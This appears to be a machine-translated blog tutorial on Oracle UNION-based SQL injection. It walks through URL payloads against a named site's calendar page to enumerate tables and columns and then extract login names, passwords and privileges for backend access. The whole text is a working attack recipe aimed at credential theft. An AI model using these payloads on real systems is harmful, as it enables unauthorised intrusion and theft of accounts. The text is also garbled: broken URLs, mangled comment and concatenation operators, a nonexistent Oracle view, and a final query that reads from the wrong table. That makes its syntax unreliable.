Oracle SQL injection

Author: b0mb # qq.com

 

Different databases have different syntax injection statements and different codes:

 

Https://www.2cto.com/calender. asp? Day = 7% 20 UNION % 20 SELECT % 20 NULL %

 

20 from % 20dual-

This dual is a pseudo-table of oracle. It does not store data, just like a temporary table.

If this is an oracle injection point, this error will occur.

 

Code:

 

[Oracle] [ODBC] [Ora] ORA-01789: query block has incorrect number of result

Columns

 

Now let's guess the display bit, just like SQL injection, but it's not like 1, 2, 3, 4, 5 ..... Instead, use null.

 

Https://www.2cto.com/calender. asp? Day = 7% 20 UNION % 20 SELECT % 20 NULL, NULL, NULL %

 

20 from % 20dual-

 

Add null until no error occurs

 

Then we can guess which display bit can be displayed, just like SQL injection.

 

Use 'A' to replace null to check which one has no error and which one is. After you have found the display space, we can find the data in the database. To do this, I can use "user_objects" and we can also use the "object_name" and "object_type" table names to display the table names and types specified by the user.

 

Code:

 

Https://www.2cto.com/calender. asp? Day = 7% 20 UNION % 20 SELECT % 20 NULL,

 

Object_name, object_type, NULL % 20 from % 20user_objects-

 

Tip: We can use all_user_objects to replace user_objects. This will show all the information, even if the current user does not own it.

Now we can see many different table names and types. If you do not do this, you will get an error.

 

In my example, we are only looking for the user table. Below we will look for the column name in the table, just like this user_tab_columns table.

 

Code:

 

Https://www.2cto.com/calender. asp? Day = 7% 20 UNION % 20 SELECT % 20 NULL,

 

Column_name, NULL, NULL % 20 from % 20user_tab_columns % 20 where % 20table_name % 20%

3d % 20 �� 'users '-

 

Tip: % 3d is a url encoded data equal to and % 20. The url encoded data is equal to space.

 

Now we can get the name of the account and password permission column as follows:

 

Code:

 

Https://www.2cto.com/calender. asp? Day = 7% 20 UNION % 20 SELECT % 20 NULL,

 

Login, password, priviledge % 20 from % 20users-

Now you can log on to the background.

 

Tip: if only one column uses the string data type, you can connect multiple columns, as shown in the following figure:

 

Code:

 

Https://www.2cto.com/calender. asp? Day = 7% 20 UNION % 20 SELECT % 20 NULL,

 

Login | ':' | password | ':' | priviledge, NULL, NULL % 20 from % 20user_objects-

 

This is like the concat function in mysql. I don't know if there is any group_concat function in oracle. It seems that I have to study it.

 

Tip: these are just a bit of a fur. If you really want to learn oracle well, you need to set up an oracle database locally and find several e-books.